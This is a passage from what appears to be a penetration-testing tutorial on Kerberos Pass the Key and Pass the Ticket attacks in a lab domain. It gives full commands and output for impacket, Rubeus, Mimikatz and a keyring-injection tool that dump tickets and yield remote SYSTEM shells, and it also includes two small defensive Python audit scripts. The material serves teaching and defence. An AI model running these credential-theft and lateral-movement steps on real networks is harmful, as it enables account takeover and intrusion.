Finally, it is possible to access any service or machine where the user account has permissions.  From Linux  From a Linux perspective, impacket can be used to perform this attack. The commands required for that purpose are the following:  root@kali:impacket-examples# python getTGT.py jurassic.park\/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation     Saving ticket in velociraptor.ccache  root@kali:impacket-examples# export KRB5CCNAME=\/root\/impacket-examples\/velociraptor.ccache  root@kali:impacket-examples# python psexec.py jurassic.park\/velociraptor@labwws02.jurassic.park -k -no-pass  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation     Requesting shares on labwws02.jurassic.park.....   Found writable share ADMIN$   Uploading file yuiQeOUk.exe   Opening SVCManager on labwws02.jurassic.park.....   Creating service sBGq on labwws02.jurassic.park.....   
Starting service sBGq.....   Press help for extra shell commands  Microsoft Windows   Copyright (c) 2009 Microsoft Corporation. All rights reserved.    C:\\Windows\\system32&gt;whoami  nt authority\\system    C:\\Windows\\system32&gt;    After generating and using the TGT, finally a shell is launched. The requested TGT can also be used with other impacket examples with the parameter -k, and even with other tools (such as smbexec.py or wmiexec.py), because it is written to a ccache file, which is a widely used format for Kerberos tickets in Linux.    At the moment of writing the examples for this article some problems arose:     \tPyAsn1Error('NamedTypes can cast only scalar values',) : Resolved by updating impacket to the latest version.   \tKDC can't found the name : Resolved by using the hostname instead of the IP address, because it was not recognized by Kerberos KDC.    From Windows  In order to accomplish this attack from a Windows machine, it is possible to use Rubeus and PsExec as follows:  C:\\Users\\triceratops&gt;.\\Rubeus.exe asktgt \/domain:jurassic.park \/user:velociraptor \/rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 \/ptt       ______        _    (_____ \\      | |     _____) )_   _| |__  _____ _   _  ___    |  __  \/| | | |  _ \\| ___ | | | |\/___)    | |  \\ \\| |_| | |_) ) ____| |_| |___ |    |_|   |_|____\/|____\/|_____)____\/(___\/      v1.3.3     Action: Ask TGT     Using rc4_hmac hash: 2a3de7fe356ee524cc9f3d579f2e0aa7   Using domain controller: Lab-WDC02.jurassic.park (10.200.220.3)   Building AS-REQ (w\/ preauth) for: 'jurassic.park\\velociraptor'   Connecting to 10.200.220.3:88   Sent 237 bytes   Received 1455 bytes   TGT request successful!   
base64(ticket.kirbi):          doIFSDCCBUSgAwIBBaEDAgEWooIEVjCCBFJhggROMIIESqADAgEFoQ8bDUpVUkFTU0lDLlBBUkuiIjAg        oAMCAQKhGTAXGwZrcmJ0Z3QbDWp1cmFzc2ljLnBhcmujggQMMIIECKADAgESoQMCAQKiggP6BIID9nUy        VTaRmuyCOYJ\/Fz0Z5We4crR6qWrxpEPDZHV09VmBp0GYWwUxwGM4M2hkbFJss6i0RG1NvKUy55D2loPI        nKXSD5kwEjJeMsVAQWvvQCNuIrVu\/XY9eGhL405ryVYNELdPxOuBNXYYZoQYLo1qxcoEkH\/ag4QTnG7z        6qH1o5RWwhmqMHNWp77LGu3lBWd0lb3t7d3pfGCU7hgWRvA390dQZ+Vzrcqfs5sHzoii8ondT9LqyvYI        4P6DwhXH1wWOVhF9Sf23wUSG5iIZvbTrHuNZvFcPmUYXF2zd0Dtx+L3ovYdWaw+7HDmu4NPspvuAlG2x        Jj\/cbGS1KuCjAtSkT9XMVu0WEFY8gIbew35l8t5H7b+8fcjTyOLFJyMIuEzTjdfzdGJ8NYsqAxG0wCtd        w4OCuqUUHuffwD4L27PC+fVVR7D5htfy6MbWVQrVqfgGIhqdC68I5COjyknobf+ksO9EDcn8+7zDUXtE        dbt9XZtt0VTNyZUfSyOMGW+pkpB8wA3QjzahpgrLVE\/8oHGAkFQ6sf\/DOr0CYinn7iC8lJ1zZj1hcDa6        Y+RVSARW4V++03uQPwtCN6mpuhIumikFCQsOTMQky8QKcsFGHdsCqySQsAoOtdWLHpuYFnaA0VDb3M+i        4yc5286jaF6NRRPBZJEZnSTCRNwhJCR3bgO3C5bzWKFCOFMjFy5GOCZoZdYIbKiVABG2ZFUuyMedCDQQ        YJrLO6oFoCL5Yeu2vrviFZUSpbUVZlxSDHnASuo1PUCfnm7oF3E6aw6\/Q\/0\/dONSQzImXC7H+t2Z7ym5        4pIzkgIZ\/p5ODWfKr\/XrrBUjmPPDzGyRUz9q1NKPv0SVi8sC5wkWAe1tipU5G582PrBWuS+Nv9XLAoKL        +LR4iWnUw3o3\/96IyCiHiCGy\/g1DLJehxb5\/wxDxwrnpDW50kFs7bwFrbD+8qWwd8apZF\/iiUyzRYJAu        jDOTyfJtZ7Vm2mOwSm1KeUboZ3u9StIkNUbmjR\/wXvwmvUCXDppO\/LeMT9w5uejGNVr+QRLPL+brAkbB        GHFoSTR0\/L6k1+8vkJzAJCOA3Yir3JJd8xRdnad4Q7Pl67CjsGKrJddt6iBzoHKPabQ\/SbDVIV4veMX7        5KtcYHM8E2CvV2sV8KD1QIOSo00Ya\/C\/EUekjWsG3YGW7UulxDwb95mDRf6ntr7jMBC8G2jd49IuJcWR        QTDFuys4L\/NsEAqLo5RPNk6bz1SpjpWlmG95hRg5DAe1M+u8aRD6NDs3A8fH6b7fZkQ+1I\/Xl5sBhfTt        7FGbTI4mG+VlEHbJpl47KTAO+jJgYj3m0\/vgcwBlO4lCMFucB3B488VEamPJU3M66hMOy6OB3TCB2qAD        AgEAooHSBIHPfYHMMIHJoIHGMIHDMIHAoBswGaADAgEXoRIEEFg+Y8LhMIWpLiabLQKBdBihDxsNSlVS        QVNTSUMuUEFSS6IZMBegAwIBAaEQMA4bDHZlbG9jaXJhcHRvcqMHAwUAQOEAAKURGA8yMDE5MDIyODEx        NTc1N1qmERgPMjAxOTAyMjgyMTU3NTdapxEYDzIwMTkwMzA3MTE1NzU3WqgPGw1KVVJBU1NJQy5QQVJL        
qSIwIKADAgECoRkwFxsGa3JidGd0Gw1qdXJhc3NpYy5wYXJr     Action: Import Ticket   Ticket successfully imported!    C:\\Users\\triceratops&gt;.\\PsExec.exe -accepteula \\\\labwws02.jurassic.park cmd    PsExec v2.2 - Execute processes remotely  Copyright (C) 2001-2016 Mark Russinovich  Sysinternals - www.sysinternals.com      Microsoft Windows   Copyright (c) 2009 Microsoft Corporation. All rights reserved.    C:\\Windows\\system32&gt;whoami  jurassic\\velociraptor    C:\\Windows\\system32&gt;    If the \/ptt parameter is not passed to Rubeus asktgt, the ticket is shown in base64. The following PowerShell command can be used to write it into a file:  [IO.File]::WriteAllBytes(\"ticket.kirbi\", [Convert]::FromBase64String(\"&lt;base64_ticket&gt;\"))    As this is a little cumbersome, I expect that the program will automatically save the ticket in future versions. After that, the command Rubeus ptt \/ticket: can be used to inject that ticket.      Pass The Ticket (PTT)  This kind of attack is similar to Pass the Key, but instead of using hashes to request a ticket, the ticket itself is stolen and used to authenticate as its owner. The way of collecting these tickets differs between Linux and Windows machines, so each process is introduced in its own section.  Harvesting tickets from Linux  On Linux, tickets are stored in credential caches or ccaches. There are 3 main types, which indicate where tickets can be found:     \tFiles, by default under \/tmp directory, in the form of krb5cc_%{uid}.   \tKernel Keyrings, a special space in the Linux kernel provided for storing keys.   \tProcess memory, used when only one process needs to use the tickets.    To verify what type of storage is used in a specific machine, the variable default_ccache_name must be checked in the \/etc\/krb5.conf file, which by default is readable by any user. If this parameter is missing, its default value is FILE:\/tmp\/krb5cc_%{uid}.    
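A defender can run the same check to audit a host. The following Python sketch is an added example, not part of the original article: it reads default_ccache_name from krb5.conf text and flags FILE caches that anyone other than their owner can access. The sample krb5.conf and the function names are constructed for illustration, and include/includedir directives are not followed.

```python
import os
import re
import stat

# Default named in the article for when default_ccache_name is not set.
DEFAULT_CCACHE = "FILE:/tmp/krb5cc_%{uid}"

# Constructed sample, not taken from a real host.
SAMPLE_KRB5_CONF = """\
[libdefaults]
    default_realm = JURASSIC.PARK
    # default_ccache_name = FILE:/tmp/krb5cc_%{uid}
    default_ccache_name = KEYRING:persistent:%{uid}

[realms]
    JURASSIC.PARK = {
        kdc = lab-wdc02.jurassic.park
    }
"""


def default_ccache_name(conf_text):
    """Return default_ccache_name from [libdefaults], or the default if absent."""
    section = None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":        # blank line or comment
            continue
        header = re.fullmatch(r"\[([^\]]+)\]", line)
        if header:
            section = header.group(1).strip().lower()
            continue
        if section == "libdefaults" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip() == "default_ccache_name" and value.strip():
                return value.strip()           # first occurrence is used here
    return DEFAULT_CCACHE


def ccache_type(name):
    """Return the TYPE of a 'TYPE:residual' name; a bare path counts as FILE."""
    prefix, sep, _ = name.partition(":")
    if sep and prefix.isalpha():
        return prefix.upper()
    return "FILE"


def audit_file_ccaches(directory="/tmp", prefix="krb5cc_"):
    """Return (path, reason) for FILE ccaches not restricted to their owner."""
    findings = []
    for entry in sorted(os.listdir(directory)):
        if not entry.startswith(prefix):
            continue
        path = os.path.join(directory, entry)
        st = os.lstat(path)                    # do not follow symlinks
        if not stat.S_ISREG(st.st_mode):
            findings.append((path, "not a regular file"))
            continue
        mode = stat.S_IMODE(st.st_mode)
        if mode & 0o077:                       # any group/other permission bit
            findings.append((path, f"mode {mode:04o} grants group/other access"))
    return findings


if __name__ == "__main__":
    conf_path = "/etc/krb5.conf"
    text = SAMPLE_KRB5_CONF
    if os.path.exists(conf_path):
        with open(conf_path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    name = default_ccache_name(text)
    print("default_ccache_name:", name, "-> type", ccache_type(name))
    if ccache_type(name) == "FILE" and os.path.isdir("/tmp"):
        for path, reason in audit_file_ccaches("/tmp"):
            print("REVIEW", path, reason)
```

A KEYRING or MEMORY result means no ticket files are expected under \/tmp, so any krb5cc_ file found there deserves a closer look.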
Hence, tickets are usually saved in files, which can only be read by the owner and, like any file in Linux, by root. With access to those ticket files, simply copying them to another machine is enough to use them in Pass The Ticket attacks.    Example of tickets in a Linux server:  # ls -lah \/tmp\/krb5*  -rw-------. 1 root         root         1.4K Mar  5 16:25 \/tmp\/krb5cc_0  -rw-------. 1 trex         domain users 1.2K Mar  7 10:08 \/tmp\/krb5cc_1120601113_ZFxZpK  -rw-------. 1 velociraptor domain users  490 Mar  7 10:14 \/tmp\/krb5cc_1120601115_uDoEa0    To extract tickets from the other 2 sources (keyrings and processes), the great paper Kerberos Credential Thievery (GNU\/Linux), released in 2017, explains ways of recovering them.    Moreover, the paper also contains several scripts to extract tickets from remote machines. In the case of keyrings, their script heracles.sh can be used. In the case of a process holding the tickets, a memory analysis is required to find the tickets inside.    Furthermore, I have developed a tool in C based on the heracles.sh script called tickey, to extract tickets from keyrings. The tool was created because the command keyctl, heavily used by heracles.sh, is not installed by default in Linux systems, so a direct call to the keyctl syscall can solve this problem.    Moreover, tickets in session or user keyrings can only be accessed by the owner user in the same session. Therefore, when tickey is executed as root, it searches for other users' sessions and injects itself in each one of them in order to retrieve those tickets.    An example of tickey output is shown below:  # \/tmp\/tickey -i   krb5 ccache_name  KEYRING:session:sess_%{uid}   root detected, so... DUMP ALL THE TICKETS!!   Trying to inject in trex session...   Successful injection at process 21866 of trex,look for tickets in \/tmp\/__krb_1120601113.ccache   Trying to inject in velociraptor session...   
Successful injection at process 20752 of velociraptor,look for tickets in \/tmp\/__krb_1120601115.ccache    Error retrieving tickets  # klist  \/tmp\/__krb_1120601113.ccache  Ticket cache: FILE:\/tmp\/__krb_1120601113.ccache  Default principal: trex@JURASSIC.PARK    Valid starting       Expires              Service principal  05\/09\/2019 15:48:36  05\/10\/2019 01:48:36  krbtgt\/JURASSIC.PARK@JURASSIC.PARK          renew until 05\/10\/2019 15:48:32    Harvesting tickets from Windows  In Windows, tickets are handled and stored by the lsass (Local Security Authority Subsystem Service) process, which is responsible for security. Hence, to retrieve tickets from a Windows system, it is necessary to communicate with lsass and ask for them. As a non-administrative user only owned tickets can be fetched, however, as machine administrator, all of them can be harvested. For this purpose, the tools Mimikatz or Rubeus can be used as shown below:    Mimikatz harvesting:  PS C:\\Users\\velociraptor&gt; .\\mimikatz.exe      .#####.   mimikatz 2.1.1 (x64) built on Mar 18 2018 00:21:25   .## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)   ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )   ## \\ \/ ##       &gt; https:\/\/blog.gentilkiwi.com\/mimikatz   '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )    '#####'        &gt; https:\/\/pingcastle.com \/ https:\/\/mysmartlogon.com   ***\/    mimikatz # sekurlsa::tickets \/export    ...  &lt;-----Mimikatz Output-----&gt;  ...    
Authentication Id : 0 ; 42211838 (00000000:028419fe)  Session           : RemoteInteractive from 2  User Name         : trex  Domain            : JURASSIC  Logon Server      : LAB-WDC01  Logon Time        : 28\/02\/2019 12:14:43  SID               : S-1-5-21-1339291983-1349129144-367733775-1113             * Username : trex           * Domain   : JURASSIC.PARK           * Password : (null)            Group 0 - Ticket Granting Service                        Start\/End\/MaxRenew: 05\/03\/2019 9:48:37 ; 05\/03\/2019 19:15:59 ; 07\/03\/2019 12:14:43             Service Name (02) : LDAP ; Lab-WDC02.jurassic.park ; jurassic.park ; @ JURASSIC.PARK             Target Name  (02) : LDAP ; Lab-WDC02.jurassic.park ; jurassic.park ; @ JURASSIC.PARK             Client Name  (01) : trex ; @ JURASSIC.PARK ( JURASSIC.PARK )             Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;             Session Key       : 0x00000012 - aes256_hmac               bd16db915bdfb0af3d57509bdea3d92bf8f0ef9976a16ebb6510111597c6d8b6             Ticket            : 0x00000012 - aes256_hmac       ; kvno  4                     * Saved to file -0-0-40a50000-trex@LDAP-Lab-WDC02.jurassic.park.kirbi !            Group 1 - Client Ticket ?            
Group 2 - Ticket Granting Ticket                        Start\/End\/MaxRenew: 28\/02\/2019 12:14:43 ; 28\/02\/2019 22:14:43 ; 07\/03\/2019 12:14:43             Service Name (02) : krbtgt ; JURASSIC.PARK ; @ JURASSIC.PARK             Target Name  (--) : @ JURASSIC.PARK             Client Name  (01) : trex ; @ JURASSIC.PARK ( $$Delegation Ticket$$ )             Flags 60a00000    : pre_authent ; renewable ; forwarded ; forwardable ;             Session Key       : 0x00000012 - aes256_hmac               21666ffd3511fb2d1e127ad96e322c3a6e8be644eabba4821ba5c425b4a58842             Ticket            : 0x00000012 - aes256_hmac       ; kvno  2                     * Saved to file -2-0-60a00000-trex@krbtgt-JURASSIC.PARK.kirbi !                        Start\/End\/MaxRenew: 05\/03\/2019 9:15:59 ; 05\/03\/2019 19:15:59 ; 07\/03\/2019 12:14:43             Service Name (02) : krbtgt ; JURASSIC.PARK ; @ JURASSIC.PARK             Target Name  (02) : krbtgt ; JURASSIC.PARK ; @ JURASSIC.PARK             Client Name  (01) : trex ; @ JURASSIC.PARK ( JURASSIC.PARK )             Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;             Session Key       : 0x00000012 - aes256_hmac               f79644af74ade15f4178e5cea3b0ce071b601f78ef4b11c09ed971142dd3bb50             Ticket            : 0x00000012 - aes256_hmac       ; kvno  2                     * Saved to file -2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi !    ...  &lt;-----Mimikatz Output-----&gt;  ...               mimikatz # exit  Bye!    
Rubeus harvesting in powershell:  PS C:\\Users\\Administrator&gt; .\\Rubeus dump       ______        _    (_____ \\      | |     _____) )_   _| |__  _____ _   _  ___    |  __  \/| | | |  _ \\| ___ | | | |\/___)    | |  \\ \\| |_| | |_) ) ____| |_| |___ |    |_|   |_|____\/|____\/|_____)____\/(___\/      v1.4.2         Action: Dump Kerberos Ticket Data (All Users)        UserName                 : Administrator    Domain                   : JURASSIC    LogonId                  : 0xdee0cb2    UserSID                  : S-1-5-21-1339291983-1349129144-367733775-500    AuthenticationPackage    : Kerberos    LogonType                : RemoteInteractive    LogonTime                : 07\/03\/2019 12:35:47    LogonServer              : LAB-WDC01    LogonServerDNSDomain     : JURASSIC.PARK    UserPrincipalName        : Administrator@jurassic.park    ...  &lt;-----Rubeus Output-----&gt;  ...        ServiceName              : krbtgt\/JURASSIC.PARK      TargetName               : krbtgt\/jurassic.park      ClientName               : trex      DomainName               : JURASSIC.PARK      TargetDomainName         : JURASSIC.PARK      AltTargetDomainName      : JURASSIC.PARK      SessionKeyType           : aes256_cts_hmac_sha1      Base64SessionKey         : 1gokewLDdgqAnN3a1KNR15q3GaZM3duydjLfb037KLs      KeyExpirationTime        : 01\/01\/1601 1:00:00      TicketFlags              : pre_authent, initial, renewable, forwardable      StartTime                : 07\/03\/2019 16:28:23      EndTime                  : 08\/03\/2019 2:28:23      RenewUntil               : 14\/03\/2019 16:28:23      TimeSkew                 : 0      EncodedTicketSize        : 1284      Base64EncodedTicket      :          doIFADCCBPygAwIBBaEDAgEWooIEBjCCBAJhggP+MIID+qADAgEFoQ8bDUpVUkFTU0lDLlBBUkuiIjAgoAMCAQKhGTAXGwZrcmJ0        Z3QbDUpVUkFTU0lDLlBBUkujggO8MIIDuKADAgESoQMCAQKiggOqBIIDpp9Nm0OTu82mrTl0Tekr8KEF3eX23qxHKcryCuzDV\/Pd        
wUNpSc+1Oxa0k2WWvZwa+H9DW4I8fr0BE7oHMs6GaNFEjDJdO\/l0qGUlCwyha05+9lg832SDEERgAA1wQDLjPogyBBTrP5OhGmf0        JevqulePfTUSxXJ\/gNvP6JCQGAf+zUL12dqGkqyq\/\/TOWSQjkgAy3NZtc1Ed3XnfI9L4VUo9YdY5fVSEci7kRm6Mk11sTV7bXSzd        4123fXLA3Usx+xJVKh5JPhvtSyDKRDNdcP2YKPoTyEuKUpsl8KhzbkEpdLPqzR+2uLHNmMzWDdsxTlytzZF9kzB9llUB2C9YLgzD        Qkrx4\/EIDH9w3u3pVVgAmZp1Y9sQhVmI9exIYVSPM\/XA8vPAL1KDGyux+ojkVDAl\/Kezqg6DWtLZO86Rpb7L7LRvk8jX\/4Y4Yi0T        MlsZjahwXn1N3ZulUiF7pvYzh9es9MkS\/X\/YqF6CiDogblLEaFniMYWNYFYMmhjfIZHgX3lyIj8UljRwdeFdt7Ezf\/pmP1rl5uON        hMlagv+prw4UcvN2u4Yeb+ybXMisMH4xonJIBr7\/MKEhmbHVmKuoT+LBMjfN7iChY82rPqbKW0J+nn4yvC3zjLlOC5HNSTdMgGV5        FSAY34RO3SCOe14jetHmq9OQ5rLO5ymWfet5jcYy+ShtrYoNTxEPodNZyFqrBDT4JZ6T9jgoYMIu+g3VcoCRN5XDUJM+tBzZ6QUu        91D0ULl3wdvbEhh89hPAy1AHEWLtAth55\/CJ0kNpWLPvLLz34OLzNg8nzCG2x9mFVP4MKvUw4JJN3LSkYRrxIg5eehSuQul43ZqQ        hxi\/+OyRoVwSfqqMeYO2QSeADaIiaFTwWaIDAu0pr1Vk+XfJGuHUWBjRocHu3dasPMhGoRlV5ehHxc58gnJ6UzkfcVDV7j1Skn7e        os6wa6ejFOrMKNSB+cBqBcvBMCCksHsnQSd4gxUiw\/7Masc9M+f9Xi3vf+f0LyiSKDdUIDOekMh\/RqQhGs9UKSjp6\/Q7EhMCd90J        UDGbwBQZhTOBZApdo1VQ609kXfv654RSZ1OzSgaaK6P0GJdJGJ5NGIuNl1n0oEOZVB0FfATLH\/xC9uD97VkH2mQ8jnFHHxseUle2        qMhkG+NsLOD7c2c9pzUNEbc4EZEjwMFx4eJwEeLnpXOMOMS6ix1YMuZjof6Q8xNmq05vpNMAOScgV7d3QmMvJLNy6LB6gBKPPBqG        4kCjgeUwgeKgAwIBAKKB2gSB132B1DCB0aCBzjCByzCByKArMCmgAwIBEqEiBCDWCiR7AsN2CoCc3drUo1HXmrcZpkzd27J2Mt9v        Tfsou6EPGw1KVVJBU1NJQy5QQVJLohEwD6ADAgEBoQgwBhsEdHJleKMHAwUAQOAAAKURGA8yMDE5MDMwNzE1MjgyM1qmERgPMjAx        OTAzMDgwMTI4MjNapxEYDzIwMTkwMzE0MTUyODIzWqgPGw1KVVJBU1NJQy5QQVJLqSIwIKADAgECoRkwFxsGa3JidGd0Gw1KVVJB        U1NJQy5QQVJL      ...  &lt;-----Rubeus Output-----&gt;  ...     
Enumerated 23 total tickets   Extracted  23 total tickets    PS C:\\Users\\Administrator&gt; [IO.File]::WriteAllBytes(\"ticket.kirbi\", [Convert]::FromBase64String(\"doIFADCCBPygAwIBBaEDAgEWooIEBjCCBAJhggP+MIID+qADAgEFoQ8bDUpVUkFTU0lDLlBBUkuiIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDUpVUkFTU0lDLlBBUkujggO8MIIDuKADAgESoQMCAQKiggOqBIIDpp9Nm0OTu82mrTl0Tekr8KEF3eX23qxHKcryCuzDV\/PdwUNpSc+1Oxa0k2WWvZwa+H9DW4I8fr0BE7oHMs6GaNFEjDJdO\/l0qGUlCwyha05+9lg832SDEERgAA1wQDLjPogyBBTrP5OhGmf0JevqulePfTUSxXJ\/gNvP6JCQGAf+zUL12dqGkqyq\/\/TOWSQjkgAy3NZtc1Ed3XnfI9L4VUo9YdY5fVSEci7kRm6Mk11sTV7bXSzd4123fXLA3Usx+xJVKh5JPhvtSyDKRDNdcP2YKPoTyEuKUpsl8KhzbkEpdLPqzR+2uLHNmMzWDdsxTlytzZF9kzB9llUB2C9YLgzDQkrx4\/EIDH9w3u3pVVgAmZp1Y9sQhVmI9exIYVSPM\/XA8vPAL1KDGyux+ojkVDAl\/Kezqg6DWtLZO86Rpb7L7LRvk8jX\/4Y4Yi0TMlsZjahwXn1N3ZulUiF7pvYzh9es9MkS\/X\/YqF6CiDogblLEaFniMYWNYFYMmhjfIZHgX3lyIj8UljRwdeFdt7Ezf\/pmP1rl5uONhMlagv+prw4UcvN2u4Yeb+ybXMisMH4xonJIBr7\/MKEhmbHVmKuoT+LBMjfN7iChY82rPqbKW0J+nn4yvC3zjLlOC5HNSTdMgGV5FSAY34RO3SCOe14jetHmq9OQ5rLO5ymWfet5jcYy+ShtrYoNTxEPodNZyFqrBDT4JZ6T9jgoYMIu+g3VcoCRN5XDUJM+tBzZ6QUu91D0ULl3wdvbEhh89hPAy1AHEWLtAth55\/CJ0kNpWLPvLLz34OLzNg8nzCG2x9mFVP4MKvUw4JJN3LSkYRrxIg5eehSuQul43ZqQhxi\/+OyRoVwSfqqMeYO2QSeADaIiaFTwWaIDAu0pr1Vk+XfJGuHUWBjRocHu3dasPMhGoRlV5ehHxc58gnJ6UzkfcVDV7j1Skn7eos6wa6ejFOrMKNSB+cBqBcvBMCCksHsnQSd4gxUiw\/7Masc9M+f9Xi3vf+f0LyiSKDdUIDOekMh\/RqQhGs9UKSjp6\/Q7EhMCd90JUDGbwBQZhTOBZApdo1VQ609kXfv654RSZ1OzSgaaK6P0GJdJGJ5NGIuNl1n0oEOZVB0FfATLH\/xC9uD97VkH2mQ8jnFHHxseUle2qMhkG+NsLOD7c2c9pzUNEbc4EZEjwMFx4eJwEeLnpXOMOMS6ix1YMuZjof6Q8xNmq05vpNMAOScgV7d3QmMvJLNy6LB6gBKPPBqG4kCjgeUwgeKgAwIBAKKB2gSB132B1DCB0aCBzjCByzCByKArMCmgAwIBEqEiBCDWCiR7AsN2CoCc3drUo1HXmrcZpkzd27J2Mt9vTfsou6EPGw1KVVJBU1NJQy5QQVJLohEwD6ADAgEBoQgwBhsEdHJleKMHAwUAQOAAAKURGA8yMDE5MDMwNzE1MjgyM1qmERgPMjAxOTAzMDgwMTI4MjNapxEYDzIwMTkwMzE0MTUyODIzWqgPGw1KVVJBU1NJQy5QQVJLqSIwIKADAgECoRkwFxsGa3JidGd0Gw1KVVJBU1NJQy5QQVJL\"))    And finally, after executing any of those tools, tickets are dumped, ready to use except for those expired.  
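The ticket dumps above print the ticket flags as a hex word (for example Flags 40a50000 in the Mimikatz output). The following Python decoder is an added example, not part of the original article or of any tool it uses: it maps that word, and the letter form printed by MIT klist -f, to flag names and notes the flags worth a second look when reviewing a cache. The function names are hypothetical and the sample lines are constructed from the output shown on this page.

```python
import re

# TicketFlags bit numbers from RFC 4120; bit 0 is the most significant bit of
# the 32-bit word. Bit 15 uses the name printed in the Mimikatz output above.
TICKET_FLAGS = {
    1: "forwardable", 2: "forwarded", 3: "proxiable", 4: "proxy",
    5: "may_postdate", 6: "postdated", 7: "invalid", 8: "renewable",
    9: "initial", 10: "pre_authent", 11: "hw_authent",
    12: "transited_policy_checked", 13: "ok_as_delegate",
    15: "name_canonicalize",
}

# Letters printed by MIT "klist -f", mapped to the same vocabulary.
KLIST_LETTERS = {
    "F": "forwardable", "f": "forwarded", "P": "proxiable", "p": "proxy",
    "D": "may_postdate", "d": "postdated", "R": "renewable", "I": "initial",
    "i": "invalid", "H": "hw_authent", "A": "pre_authent",
    "T": "transited_policy_checked", "O": "ok_as_delegate", "a": "anonymous",
}

# Constructed sample: flag lines as printed by Mimikatz and Windows klist.
SAMPLE_OUTPUT = """\
Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Flags 60a00000    : pre_authent ; renewable ; forwarded ; forwardable ;
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
"""


def decode_hex_flags(value):
    """Decode a 32-bit flags word (int or hex string) into flag names."""
    word = int(value, 16) if isinstance(value, str) else int(value)
    if not 0 <= word <= 0xFFFFFFFF:
        raise ValueError("ticket flags must fit in 32 bits")
    names = []
    for bit in range(32):
        if word & (1 << (31 - bit)):           # Kerberos bit 0 is the MSB
            names.append(TICKET_FLAGS.get(bit, "bit_%d" % bit))
    return names


def decode_klist_letters(letters):
    """Decode the 'Flags: RIA' letter string printed by klist -f."""
    unknown = [c for c in letters if c not in KLIST_LETTERS]
    if unknown:
        raise ValueError("unknown flag letters: %s" % "".join(unknown))
    return [KLIST_LETTERS[c] for c in letters]


def flags_in_output(text):
    """Extract every 8-digit flags word from Mimikatz or klist output."""
    pattern = r"Flags\s+(?:0x)?([0-9A-Fa-f]{8})\b"
    return [m.group(1).lower() for m in re.finditer(pattern, text)]


def review(names):
    """Return notes on flags that matter when triaging a ticket."""
    notes = []
    if "pre_authent" not in names:
        notes.append("no pre_authent: account may not require Kerberos pre-authentication")
    if "forwarded" in names:
        notes.append("forwarded: ticket was delegated from another host")
    if "ok_as_delegate" in names:
        notes.append("ok_as_delegate: target service is trusted for delegation")
    return notes


if __name__ == "__main__":
    for word in flags_in_output(SAMPLE_OUTPUT):
        names = decode_hex_flags(word)
        print(word, names, review(names))
    print("RIA", decode_klist_letters("RIA"))
```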
Swapping Linux and Windows tickets between platforms  Before using the tickets, it is important to have them in the proper format, because Windows and Linux use different approaches to save them. In order to convert from ccache (Linux file format) to kirbi (Windows file format used by Mimikatz and Rubeus), and vice versa, the following tools can be used:     \tThe ticket_converter script. The only needed parameters are the current ticket and the output file; it automatically detects the input ticket file format and converts it. For example:    root@kali:ticket_converter# python ticket_converter.py velociraptor.ccache velociraptor.kirbi  Converting ccache &gt; kirbi  root@kali:ticket_converter# python ticket_converter.py velociraptor.kirbi velociraptor.ccache  Converting kirbi &gt; ccache       \tKekeo, to convert them in Windows. This tool was not checked due to requiring a license in their ASN1 library, but I think it is worth mentioning.    From Linux  To perform the pass the ticket attack by using psexec.py from impacket, just do the following:  root@kali:impacket-examples# export KRB5CCNAME=\/root\/impacket-examples\/krb5cc_1120601113_ZFxZpK   root@kali:impacket-examples# python psexec.py jurassic.park\/trex@labwws02.jurassic.park -k -no-pass  Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation     Requesting shares on labwws02.jurassic.park.....   Found writable share ADMIN$   Uploading file SptvdLDZ.exe   Opening SVCManager on labwws02.jurassic.park.....   Creating service zkNG on labwws02.jurassic.park.....   Starting service zkNG.....   Press help for extra shell commands  Microsoft Windows   Copyright (c) 2009 Microsoft Corporation. All rights reserved.    C:\\Windows\\system32&gt;whoami  nt authority\\system    C:\\Windows\\system32&gt;      As with PTK attacks, in order to use a ticket with any impacket tool, just specify the KRB5CCNAME environment variable and the -no-pass -k parameters.    
While performing this technique, an error was shown by impacket:  SMB SessionError: STATUS_ACCESS_DENIED..., even if the user had access to the remote machine. This issue was caused by the fact that a ticket without the A flag (pre-authenticated) was used, because that domain user did not need Kerberos pre-authentication. To check ticket flags in Linux, the command klist -f  can be used, which is part of the krb5 package. Example:  root@kali:impacket-examples# klist -f -c krb5cc_1120601113_ZFxZpK  Ticket cache: FILE:krb5cc_1120601113_ZFxZpK  Default principal: velociraptor@JURASSIC.PARK    Valid starting     Expires            Service principal  03\/07\/19 11:08:45  03\/07\/19 21:08:45  krbtgt\/JURASSIC.PARK@JURASSIC.PARK  \trenew until 03\/08\/19 11:08:41, Flags: RIA    From Windows  In a Windows machine, Rubeus or Mimikatz can be used in order to inject tickets in the current session, no special privileges are required to accomplish this task. After that, it is possible to use a tool like PsExec to execute commands in remote machines as the new user. Example executions of both tools are shown below:    Mimikatz example:  PS C:\\Users\\velociraptor&gt; .\\mimikatz.exe      .#####.   mimikatz 2.1.1 (x64) built on Mar 18 2018 00:21:25   .## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)   ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )   ## \\ \/ ##       &gt; https:\/\/blog.gentilkiwi.com\/mimikatz   '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )    '#####'        &gt; https:\/\/pingcastle.com \/ https:\/\/mysmartlogon.com   ***\/    mimikatz # kerberos::ptt -2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi    * File: '-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi': OK    mimikatz # exit  Bye!  
